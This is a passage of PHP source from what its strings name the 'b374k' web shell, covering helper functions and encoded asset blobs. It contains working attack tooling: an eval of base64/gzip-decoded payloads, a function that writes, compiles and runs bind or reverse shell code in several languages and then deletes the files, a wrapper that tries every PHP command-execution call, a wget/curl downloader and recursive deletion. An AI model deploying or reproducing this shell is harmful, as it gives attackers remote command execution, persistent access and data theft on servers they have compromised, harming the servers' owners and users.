  125. $s_style = "rVbLjpswFP0VqqhSH4AgSTMzoH5Cl11VXRgwwRqwkTGdZBD/Xj/BgJNppbE3Drm+z3PP9ZehJJgFJWhQfU1+Zj1mvfeDYOJ3kKIyHTNSXIcM5M9nSnpcJLtIrlRe69ArTOJ9e0lzUhOa7Eq51J8vEJ0rlhy58FjRISO0gDSJ24vXkRoV3m4vVzqCwdw+y0PK4IUFBcwJBQwRnGCCIRdLKvIH0mFpamwpHFpQFAifk8h75L6MJaHNUKCurcE1QbhG4joDWQ09VvntkPe04yoKWIK+Zum4awDCiyBjudKgIa+BcjygoEB9l8QRt+D49IIKVvFj9DE13vC8KH92FQRcfpBxgRqdcVLDkqUNoGeEk2i6EU2yHiuGe39X8TBXYC8c4PnOnhELGAW4ExlIKGGAwU9BfAgPDwU8f1bx3BO4b9IDfggvLU8/rFHHVD08sK7IroG4d6XTaPdEZo4yMxR2vATDfyR6iyMDG1HnoFKoi09CdOuCdhXINTukgGOCPprChSJ0hEui0RuIsrlMa0UnS4mIUSiWnihNLKs7j9FB+7gXKeAZZCgHtcZFg4qi5mgNz+DKs23jXZuye+tB9JYUepfq15AxHmTXglxHwLWLYjZoUc79k9jpv3StQ+WKOd7Fcwd+jhv4iC8bgM+1VoFqkrHDPZzEvu3oW37O/48hwm3PXv2wpaRpmR+yCwMUAle3aKBHJoqMMEYaG32HJ7HvU7EFR25emR22GDJ+WDSmUXp4iORV5XnWs2Flb+H6k9hrZNyk/qn/JBkYbhkcXCrKFM0inHTcQ2IS4Px5M2/aus0Xrl5kpE1Xk2VWX22SuOgQZcHcPk0gm+5TB9DiR7E/oKYllAHMJ1PYwYbP5CuaxpkM00XToeApT045O4HLFjjdJVCtVuXaqH7U1RfKK5/HvfXYwUlK/u0aaMlqbw/HHGJOGjauv61xlou9ZpfTpuWtL1sXXGEv5kAczbFPUy6XS9Augi8lcmb7ZrjWwFGQN0r+JVeOxNvotQfPUnnOE8lTOj2T4ngmvWtGLu8zfm+n8bg0J6p9M9ajXGsG2QLeMx2JCUPlApTmktahH6xbYKxRq40cFvDXvnv72diMBa16DEtC2PKBR4VaG8IieY5pqDWtCGP9bPBV5vjJRtsoOfkXu7bwe17B/JmL/A7zrgvML++rV4MM1vKjPBkQqKeMfDmaJ5NosuWrOchqkj8vH1bLVgwobCFgnJb0yf6vJR2S3MyrdeOho5/iLUGy5d+OKJEHWDgic1sOpMeqi33NNrE5UP9Ng0vmHf8C";
  126. $s_mime_types = "dZThdqMgEIX/7zn7DvMC2jZ62t3HmQgaGkepCDFvvxeNis32xx3huwMYmUkwSvcvRWMtIfz+Fbb5CeC0gsvp/Y1iSEARQZGAMoJyBZ9WN/Rpm7ADoUWNrEw+T7TIbmeJLemhgNCUu4EdH2EekLwh47Sd0DcN9fuBX95U19GIpq+RpN946FSudKXziyIfLlC4PHnSn02r4Un05cm3ca2Nnn3yXPRc9NyTN0+jFXV8pXDO63gmBimvw0hQiuJH8ENLMnmS0h8sl9mW74Nmdc9FK8O5vQeC0iyc7fP4kX3w8UUOWwQTekJY2U2fhWJYwZTVuBooAa0hKAXIaJMMibeZLhEeh95dmeQK51ooBJfYHe64axLgMnY1LZoOPPRngg7shneWbyQAhW9sAjvudgtg4cCWW+OQ/EDXmAxFZTTNMTFwjIvHsFemf2FlKyHEFZzZmYrYk+vUysQoQwg0D6480CBmM5dm4H2+tAC+HLoUioMCjYBnsWUtzcAUn85OK3aFELRNTXslhHW+1ek8RWlwLA8+2KYxI7fZzXTKke6Pawcm6IBGR9A3FJsPj4tKeesr3Y156E2lqQ029f5b2IzCPhzWeT1wjh/Q2vLP6yttox+SPsqPR1Ic/ZD0933dKY7SpMFYgla0dsr2SlPGjLvmKgGmRgGbWXNIvIprgnZQt1gew46StkmO2f4RCp9A1DKjlnk6MmHUfLLYdhk+a7tc+cBCww8mbsA3pkNx2j3hxmgr3up9EprkHw==";
  127. // http://www.kryogenix.org/code/browser/sorttable/ - SortTable (c) Stuart Langridge
  128. $s_sortable_js = "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";
  129. // https://github.com/ded/domready - domready (c) Dustin Diaz
  130. $s_domready_js = "VVJNb9swDP0riQ6GBAjOetglheBD19uGHrpbkAKaRFcqZMmQ6HSB5/8+2mm+Lpb5yPf4SGndDtGgT5GDRDHisYfUrrpkhwBrxYZoofURLGtOWA1/+5SxKORi+1V9KlGKnbVYVd2lat1ZSqc/H2CQNSeQIwk4X3awn8UmzmzqMmh7ZPJqSozn/1U/R049PH46H4CDwro43xJXAPEPOq9Q7fYyyqzWD9Irm8zQQURZlK/PwXOABUuqEPZqcgpBDor9ePn1lCJS6mfSlgaWWjFt7fNhhnyhDGRyRmPExWVBjWCcju/AZFBsAV9nkEmjUrN5C4vQvzez2V4Cs5FOmRqhIPe7sBePGXDIceV3el9V85cPMqrLBsTo6wxdOsCdk7lIZiF7mnw+E3FrjaiNW+p4ey+yIRc3XauK00rgrnwRE5OQQO4v1CjGAqFdK0x945o4X3vdD8VRZnvTAPNxvG6UswAtMjEZjcbRVY9fYxbA376DNFDLKxlIbJLfv4kpzi9BTNvbF+AauHYFMU3iPw==";
  131.  
  132. // magic quote and shit :-p
  133. function clean($arr){
  134.     $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
  135.     if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
  136.         if(is_array($arr)){
  137.             foreach($arr as $k=>$v){
  138.                 if(is_array($v)) $arr[$k] = clean($v);
  139.                 else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
  140.             }
  141.         }
  142.     }
  143.     return $arr;
  144. }
  145. // function read file
  146. function fgc($file){
  147.     return file_get_contents($file);
  148. }
  149. // encryption for shell password
  150. function kript($plain){
  151.         return sha1(md5($plain));
  152. }
  153. function changepass($plain){
  154.     $newpass = kript($plain);
  155.     $newpass = "\$s_pass = \"".$newpass."\";";
  156.     $con = fgc($_SERVER['SCRIPT_FILENAME']);
  157.     $con = preg_replace("/\\\$s_pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$newpass,$con);
  158.     return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
  159. }
  160. function get_code($t, $c){
  161.     global $s_self;
  162.     $c = gzinflate(base64_decode($c));
  163.     if($t=="css"){
  164.         return "<link rel='stylesheet' type='text/css' href='".$s_self."|' />";
  165.        
  166.     }
  167.     elseif($t=="js"){
  168.         return "<script type='text/javascript' src='".$s_self."!'></script>";
  169.     }
  170. }
  171. function showcode($raw){
  172.     $c = gzinflate(base64_decode($raw));
  173.     ob_get_contents();
  174.     ob_end_clean();
  175.     ob_start();
  176.     eval("?>".$c);
  177.     $s_res = ob_get_contents();
  178.     ob_end_clean();
  179.     echo $s_res;
  180.     die(); 
  181. }
  182. // addslashes if on windows
  183. function adds($s_s){
  184.     global $s_win;
  185.     return ($s_win)? addslashes($s_s):$s_s;
  186. }
  187. // add slash to the end of given path
  188. function cp($s_p){
  189.     global $s_win;
  190.     if(@is_dir($s_p)){
  191.         $s_x = DS;
  192.         while(substr($s_p, -1) == $s_x) $s_p = rtrim($s_p, $s_x);
  193.         return ($s_win)? preg_replace("/\\\\+/is", "\\", $s_p.$s_x):$s_p.$s_x;
  194.     }
  195.     return $s_p;
  196. }
  197. // make link for folder $s_cwd and all of its parent folder
  198. function swd($s_p){
  199.     global $s_self;
  200.     $s_ps = explode(DS,$s_p);
  201.     $s_pu = "";
  202.     for($s_i = 0; $s_i < sizeof($s_ps)-1; $s_i++){
  203.         $s_pz = "";
  204.         for($s_j = 0; $s_j <= $s_i; $s_j++) $s_pz .= $s_ps[$s_j].DS;
  205.         $s_pu .= "<a href='".$s_self."cd=".pl($s_pz)."'>".$s_ps[$s_i]." ".DS." </a>";
  206.     }
  207.     return trim($s_pu);
  208. }
  209. // htmlspecialchars
  210. function hss($s_t){
  211.     //$s_s = htmlspecialchars($s_s, 8);
  212.     return htmlspecialchars($s_t, 2 | 1);
  213. }
  214. // function raw urldecode
  215. function ru($str){
  216.     return (is_array($str))? array_map("rawurldecode", $str):rawurldecode($str);
  217. }
  218. // encode link, htmlspecialchars and rawurlencode
  219. function pl($str){
  220.     return hss(rawurlencode($str));
  221. }
  222. // add quotes
  223. function pf($f){
  224.     return "\"".$f."\"";
  225. }
  226. // replace spaces with underscore ( _ )
  227. function cs($s_t){
  228.     return str_replace(array(" ", "\"", "'"), "_", $s_t);
  229. }
  230. // trim and urldecode
  231. function ss($s_t){
  232.     return rawurldecode($s_t);
  233. }
  234. // return tag html for notif
  235. function notif($s){
  236.     return "<div class='notif'>".$s."</div>";
  237. }
  238. // bind and reverse shell
  239. function rs($s_rstype,$s_rstarget,$s_rscode){
  240.     // resources $s_rs_pl $s_rs_py $s_rs_rb $s_rs_js $s_rs_c $s_rs_java $s_rs_java $s_rs_win $s_rs_php
  241.     $s_result = $s_fpath = "";
  242.     $s_fc = gzinflate(base64_decode($s_rscode));
  243.  
  244.     $s_errperm = "Directory ".getcwd().DS." is not writable, please change to a writable one";
  245.     $s_errgcc = "Unable to compile using gcc";
  246.     $s_errjavac = "Unable to compile using javac";
  247.  
  248.     $s_split = explode("_", $s_rstype);
  249.     $s_method = $s_split[0];
  250.     $s_lang = $s_split[1];
  251.     if($s_lang=="py" || $s_lang=="pl" || $s_lang=="rb" || $s_lang=="js"){
  252.         if($s_lang=="py") $s_runlang = "python";
  253.         elseif($s_lang=="pl") $s_runlang = "perl";
  254.         elseif($s_lang=="rb") $s_runlang = "ruby";
  255.         elseif($s_lang=="js") $s_runlang = "node";
  256.         $s_fpath = "b374k_rs.".$s_lang;
  257.         if(@is_file($s_fpath)) unlink($s_fpath);
  258.         if($s_file = fopen($s_fpath, "w")){
  259.             fwrite($s_file, $s_fc);
  260.             fclose($s_file);
  261.             if(@is_file($s_fpath)){
  262.                 $s_result = exe("chmod +x ".$s_fpath);
  263.                 if($s_runlang=="node"){
  264.                     if(check_access("node")!==false) $s_result = exe($s_runlang." ".$s_fpath." ".$s_rstarget);
  265.                     elseif(check_access("nodejs")!==false) $s_result = exe($s_runlang."js ".$s_fpath." ".$s_rstarget);
  266.                    
  267.                 }
  268.                 else $s_result = exe($s_runlang." ".$s_fpath." ".$s_rstarget);
  269.             }
  270.             else $s_result = $s_errperm;
  271.         }
  272.         else $s_result = $s_errperm;
  273.     }
  274.     elseif($s_lang=="c"){
  275.         $s_fpath = "b374k_rs";
  276.         if(@is_file($s_fpath)) unlink($s_fpath);
  277.         if(@is_file($s_fpath.".c")) unlink($s_fpath.".c");
  278.         if($s_file = fopen($s_fpath.".c", "w")){
  279.             fwrite($s_file,$s_fc);
  280.             fclose($s_file);
  281.             if(@is_file($s_fpath.".c")){
  282.                 $s_result = exe("gcc ".$s_fpath.".c -o ".$s_fpath);
  283.                 if(@is_file($s_fpath)){
  284.                     $s_result = exe("chmod +x ".$s_fpath);
  285.                     $s_result = exe("./".$s_fpath." ".$s_rstarget);
  286.                 }
  287.                 else $s_result = $s_errgcc;
  288.             }
  289.             else $s_result = $s_errperm;
  290.         }
  291.         else $s_result = $s_errperm;
  292.     }
  293.     elseif($s_lang=="win"){
  294.         $s_fpath = "b374k_rs.exe";
  295.         if(@is_file($s_fpath)) unlink($s_fpath);
  296.         if($s_file = fopen($s_fpath,"w")){
  297.             fwrite($s_file,$s_fc);
  298.             fclose($s_file);
  299.             if(@is_file($s_fpath)){
  300.                 $s_result = exe($s_fpath." ".$s_rstarget);
  301.             }
  302.             else $s_result = $s_errperm;
  303.         }
  304.         else $s_result = $s_errperm;
  305.     }
  306.     elseif($s_lang=="java"){
  307.         $s_fpath = "b374k_rs";
  308.         if(@is_file($s_fpath.".java")) unlink($s_fpath.".java");
  309.         if(@is_file($s_fpath.".class")) unlink($s_fpath.".class");
  310.         if($s_file = fopen($s_fpath.".java", "w")){
  311.             fwrite($s_file,$s_fc);
  312.             fclose($s_file);
  313.             if(@is_file($s_fpath.".java")){
  314.                 $s_result = exe("javac ".$s_fpath.".java");
  315.                 if(@is_file($s_fpath.".class")){
  316.                     $s_result = exe("java ".$s_fpath." ".$s_rstarget);
  317.                 }
  318.                 else $s_result = $s_errjavac;
  319.             }
  320.             else $s_result = $s_errperm;
  321.         }
  322.         else $s_result = $s_errperm;
  323.     }
  324.     elseif($s_lang=="php"){
  325.         $s_result = eval("?>".$s_fc);
  326.     }
  327.  
  328.     if(@is_file($s_fpath)) unlink($s_fpath);
  329.     if(@is_file($s_fpath.".c")) unlink($s_fpath.".c");
  330.     if(@is_file($s_fpath.".java")) unlink($s_fpath.".java");
  331.     if(@is_file($s_fpath.".class")) unlink($s_fpath.".class");
  332.     if(@is_file($s_fpath."\$pt.class")) unlink($s_fpath."\$pt.class");
  333.  
  334.     return $s_result;
  335. }
  336. function geol($str){
  337.     $nl = PHP_EOL;
  338.     if(preg_match("/\r\n/", $str, $r)) $nl = "\r\n";
  339.     else{
  340.         if(preg_match("/\n/", $str, $r)) $nl = "\n";
  341.         elseif(preg_match("/\r/", $str, $r)) $nl = "\r";
  342.     }
  343.     return bin2hex($nl);
  344. }
  345. // format bit
  346. function ts($s_s){
  347.     if($s_s<=0) return 0;
  348.     $s_w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
  349.     $s_e = floor(log($s_s)/log(1024));
  350.     return sprintf('%.2f '.$s_w[$s_e], ($s_s/pow(1024, floor($s_e))));
  351. }
  352. // get file size
  353. function gs($s_f){
  354.     $s_s = @filesize($s_f);
  355.     if($s_s !== false){
  356.         if($s_s<=0) return 0;
  357.         return ts($s_s);
  358.     }
  359.     else return "???";
  360. }
  361. // get file permissions
  362. function gp($s_f){
  363.     if($s_m = @fileperms($s_f)){
  364.         $s_p = 'u';
  365.         if(($s_m & 0xC000) == 0xC000)$s_p = 's';
  366.         elseif(($s_m & 0xA000) == 0xA000)$s_p = 'l';
  367.         elseif(($s_m & 0x8000) == 0x8000)$s_p = '-';
  368.         elseif(($s_m & 0x6000) == 0x6000)$s_p = 'b';
  369.         elseif(($s_m & 0x4000) == 0x4000)$s_p = 'd';
  370.         elseif(($s_m & 0x2000) == 0x2000)$s_p = 'c';
  371.         elseif(($s_m & 0x1000) == 0x1000)$s_p = 'p';
  372.         $s_p .= ($s_m & 00400)? 'r':'-';
  373.         $s_p .= ($s_m & 00200)? 'w':'-';
  374.         $s_p .= ($s_m & 00100)? 'x':'-';
  375.         $s_p .= ($s_m & 00040)? 'r':'-';
  376.         $s_p .= ($s_m & 00020)? 'w':'-';
  377.         $s_p .= ($s_m & 00010)? 'x':'-';
  378.         $s_p .= ($s_m & 00004)? 'r':'-';
  379.         $s_p .= ($s_m & 00002)? 'w':'-';
  380.         $s_p .= ($s_m & 00001)? 'x':'-';
  381.         return $s_p;
  382.     }
  383.     else return "???????????";
  384. }
  385. // shell command
  386. function exe($s_c){
  387.     $s_out = "";
  388.     $s_c = $s_c." 2>&1";
  389.  
  390.     if(is_callable('system')) {
  391.         ob_start();
  392.         @system($s_c);
  393.         $s_out = ob_get_contents();
  394.         ob_end_clean();
  395.         if(!empty($s_out)) return $s_out;
  396.     }
  397.     if(is_callable('shell_exec')){
  398.         $s_out = @shell_exec($s_c);
  399.         if(!empty($s_out)) return $s_out;
  400.     }
  401.     if(is_callable('exec')) {
  402.         @exec($s_c,$s_r);
  403.         if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s;
  404.         if(!empty($s_out)) return $s_out;
  405.     }
  406.     if(is_callable('passthru')) {
  407.         ob_start();
  408.         @passthru($s_c);
  409.         $s_out = ob_get_contents();
  410.         ob_end_clean();
  411.         if(!empty($s_out)) return $s_out;
  412.     }
  413.     if(is_callable('proc_open')) {
  414.         $s_descriptorspec = array(
  415.             0 => array("pipe", "r"),
  416.             1 => array("pipe", "w"),
  417.             2 => array("pipe", "w"));
  418.         $s_proc = @proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array());
  419.         if (is_resource($s_proc)) {
  420.             while($s_si = fgets($s_pipes[1])) {
  421.                 if(!empty($s_si)) $s_out .= $s_si;
  422.             }
  423.             while($s_se = fgets($s_pipes[2])) {
  424.                 if(!empty($s_se)) $s_out .= $s_se;
  425.             }
  426.         }
  427.         @proc_close($s_proc);
  428.         if(!empty($s_out)) return $s_out;
  429.     }
  430.     if(is_callable('popen')){
  431.         $s_f = @popen($s_c, 'r');
  432.         if($s_f){
  433.             while(!feof($s_f)){
  434.                 $s_out .= fread($s_f, 2096);
  435.             }
  436.             pclose($s_f);
  437.         }
  438.         if(!empty($s_out)) return $s_out;
  439.     }
  440.     return "";
  441. }
  442. // delete dir and all of its content (no warning !) xp
  443. function rmdirs($s){
  444.     $s = (substr($s,-1)=='/')? $s:$s.'/';
  445.     if($dh = opendir($s)){
  446.         while(($f = readdir($dh))!==false){
  447.             if(($f!='.')&&($f!='..')){
  448.                 $f = $s.$f;
  449.                 if(@is_dir($f)) rmdirs($f);
  450.                 else @unlink($f);
  451.             }
  452.         }
  453.         closedir($dh);
  454.         @rmdir($s);
  455.     }
  456. }
  457. function copys($s,$d,$c=0){
  458.     if($dh = opendir($s)){
  459.         if(!@is_dir($d)) @mkdir($d);
  460.         while(($f = readdir($dh))!==false){
  461.             if(($f!='.')&&($f!='..')){
  462.                 if(@is_dir($s.DS.$f)) copys($s.DS.$f,$d.DS.$f);
  463.                 else copy($s.DS.$f,$d.DS.$f);
  464.             }
  465.         }
  466.         closedir($dh);
  467.     }
  468. }
  469. // get array of all files from given directory
  470. function getallfiles($s_dir){
  471.     $s_f = glob($s_dir.'*');
  472.     for($s_i = 0; $s_i<count($s_f); $s_i++){
  473.         if(@is_dir($s_f[$s_i])){
  474.             $s_a = glob($s_f[$s_i].DS.'*');
  475.             if(is_array($s_f) && is_array($s_a)) $s_f = array_merge($s_f, $s_a);
  476.         }
  477.     }
  478.     return $s_f;
  479. }
  480. // download file from internet
  481. function dlfile($s_u,$s_p){
  482.     global $s_wget, $s_lwpdownload, $s_lynx, $s_curl;
  483.  
  484.     if(!preg_match("/[a-z]+:\/\/.+/",$s_u)) return false;
  485.     $s_n = basename($s_u);
  486.  
  487.     // try using php functions
  488.     if($s_t = @fgc($s_u)){
  489.  
  490.         if(@is_file($s_p)) unlink($s_p);
  491.         if($s_f = fopen($s_p,"w")){
  492.             fwrite($s_f, $s_t);
  493.             fclose($s_f);
  494.             if(@is_file($s_p)) return true;
  495.         }
  496.     }
  497.     // using wget
  498.     if($s_wget){
  499.         $buff = exe("wget ".$s_u." -O ".$s_p);
  500.         if(@is_file($s_p)) return true;
  501.     }
  502.     // try using curl
  503.     if($s_curl){
  504.         $buff = exe("curl ".$s_u." -o ".$s_p);
  505.         if(@is_file($s_p)) return true;
  506.     }
  507.     // try using lynx
  508.     if($s_lynx){
  509.         $buff = exe("lynx -source ".$s_u." > ".$s_p);
  510.         if(@is_file($s_p)) return true;
  511.     }
  512.     // try using lwp-download
  513.     if($s_lwpdownload){
  514.         $buff = exe("lwp-download ".$s_u." ".$s_p);
  515.         if(@is_file($s_p)) return true;
  516.     }
  517.     return false;
  518. }
  519. // find writable dir
  520. function get_writabledir(){
  521.     if(!$s_d = getenv("TEMP")) if(!$s_d = getenv("TMP")) if(!$s_d = getenv("TMPDIR")){
  522.         if(@is_writable("/tmp")) $s_d = "/tmp/";
  523.         else if(@is_writable(".")) $s_d = ".".DS;
  524.     }
  525.     return cp($s_d);
  526. }
  527. // zip function
  528. function zip($s_srcarr, $s_dest){
  529.     if(!extension_loaded('zip')) return false;
  530.     if(class_exists("ZipArchive")){
  531.         $s_zip = new ZipArchive();
  532.         if(!$s_zip->open($s_dest, 1)) return false;
  533.  
  534.         if(!is_array($s_srcarr)) $s_srcarr = array($s_srcarr);
  535.         foreach($s_srcarr as $s_src){
  536.             $s_src = str_replace('\\', '/', $s_src);
  537.             if(@is_dir($s_src)){
  538.                 $s_files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($s_src), 1);
  539.                 foreach($s_files as $s_file){
  540.                     $s_file = str_replace('\\', '/', $s_file);
  541.                     if(in_array(substr($s_file, strrpos($s_file, '/')+1), array('.', '..'))) continue;
  542.                     if (@is_dir($s_file)===true)    $s_zip->addEmptyDir(str_replace($s_src.'/', '', $s_file.'/'));
  543.                     else if (@is_file($s_file)===true) $s_zip->addFromString(str_replace($s_src.'/', '', $s_file), @fgc($s_file));
  544.                 }
  545.             }
  546.             elseif(@is_file($s_src) === true) $s_zip->addFromString(basename($s_src), @fgc($s_src));
  547.         }
  548.         $s_zip->close();
  549.         return true;
  550.     }
  551. }
  552. // check shell permission to access program
  553. function check_access($s_lang){
  554.     $s_s = false;
  555.     $ver = "";
  556.     switch($s_lang){
  557.         case "python":
  558.             $s_cek = strtolower(exe("python -h"));
  559.             if(strpos($s_cek,"usage")!==false) $ver = exe("python -V");
  560.             break;
  561.         case "perl":
  562.             $s_cek = strtolower(exe("perl -h"));
  563.             if(strpos($s_cek,"usage")!==false) $ver = exe("perl -e \"print \$]\"");
  564.             break;
  565.         case "ruby":
  566.             $s_cek = strtolower(exe("ruby -h"));
  567.             if(strpos($s_cek,"usage")!==false) $ver = exe("ruby -v");
  568.             break;
  569.         case "node":
  570.             $s_cek = strtolower(exe("node -h"));
  571.             if(strpos($s_cek,"usage")!==false) $ver = exe("node -v");
  572.             break;
  573.         case "nodejs":
  574.             $s_cek = strtolower(exe("nodejs -h"));
  575.             if(strpos($s_cek,"usage")!==false) $ver = exe("nodejs -v");
  576.             break;
  577.         case "gcc":
  578.             $s_cek = strtolower(exe("gcc --help"));
  579.             if(strpos($s_cek,"usage")!==false){
  580.                 $s_ver = exe("gcc --version");
  581.                 $s_ver = explode("\n",$s_ver);
  582.                 if(count($s_ver)>0) $ver = $s_ver[0];
  583.             }
  584.             break;
  585.         case "tar":
  586.             $s_cek = strtolower(exe("tar --help"));
  587.             if(strpos($s_cek,"usage")!==false){
  588.                 $s_ver = exe("tar --version");
  589.                 $s_ver = explode("\n",$s_ver);
  590.                 if(count($s_ver)>0) $ver = $s_ver[0];
  591.             }
  592.             break;
  593.         case "java":
  594.             $s_cek = strtolower(exe("java -help"));
  595.             if(strpos($s_cek,"usage")!==false) $ver = str_replace("\n", ", ", exe("java -version"));
  596.             break;
  597.         case "javac":
  598.             $s_cek = strtolower(exe("javac -help"));
  599.             if(strpos($s_cek,"usage")!==false) $ver = str_replace("\n", ", ", exe("javac -version"));
  600.             break;         
  601.         case "wget":
  602.             $s_cek = strtolower(exe("wget --help"));
  603.             if(strpos($s_cek,"usage")!==false){
  604.                 $s_ver = exe("wget --version");
  605.                 $s_ver = explode("\n",$s_ver);
  606.                 if(count($s_ver)>0) $ver = $s_ver[0];
  607.             }
  608.             break;
  609.         case "lwpdownload":
  610.             $s_cek = strtolower(exe("lwp-download --help"));
  611.             if(strpos($s_cek,"usage")!==false){
  612.                 $s_ver = exe("lwp-download --version");
  613.                 $s_ver = explode("\n",$s_ver);
  614.                 if(count($s_ver)>0) $ver = $s_ver[0];
  615.             }
  616.             break;
  617.         case "lynx":
  618.             $s_cek = strtolower(exe("lynx --help"));
  619.             if(strpos($s_cek,"usage")!==false){
  620.                 $s_ver = exe("lynx -version");
  621.                 $s_ver = explode("\n",$s_ver);
  622.                 if(count($s_ver)>0) $ver = $s_ver[0];
  623.             }
  624.             break;
  625.         case "curl":
  626.             $s_cek = strtolower(exe("curl --help"));
  627.             if(strpos($s_cek,"usage")!==false){
  628.                 $s_ver = exe("curl --version");
  629.                 $s_ver = explode("\n",$s_ver);
  630.                 if(count($s_ver)>0) $ver = $s_ver[0];
  631.             }
  632.             break;
  633.         default:
  634.             return false;
  635.     }
  636.     if(!empty($ver)) $s_s = $ver;
  637.     return $s_s;
  638. }
  639. // explorer, return a table of given dir
  640. function showdir($s_cwd){
  641.     global $s_self, $s_win, $s_posix, $s_tar;
  642.  
  643.     $s_fname = $s_dname = array();
  644.     $s_total_file = $s_total_dir = 0;
  645.  
  646.     if($s_dh = @opendir($s_cwd)){
  647.         while($s_file = @readdir($s_dh)){
  648.             if(@is_dir($s_file)) $s_dname[] = $s_file;
  649.             elseif(@is_file($s_file))$s_fname[] = $s_file;
  650.         }
  651.         closedir($s_dh);
  652.     }
  653.  
  654.     natcasesort($s_fname);
  655.     natcasesort($s_dname);
  656.     $s_list = array_merge($s_dname,$s_fname);
  657.  
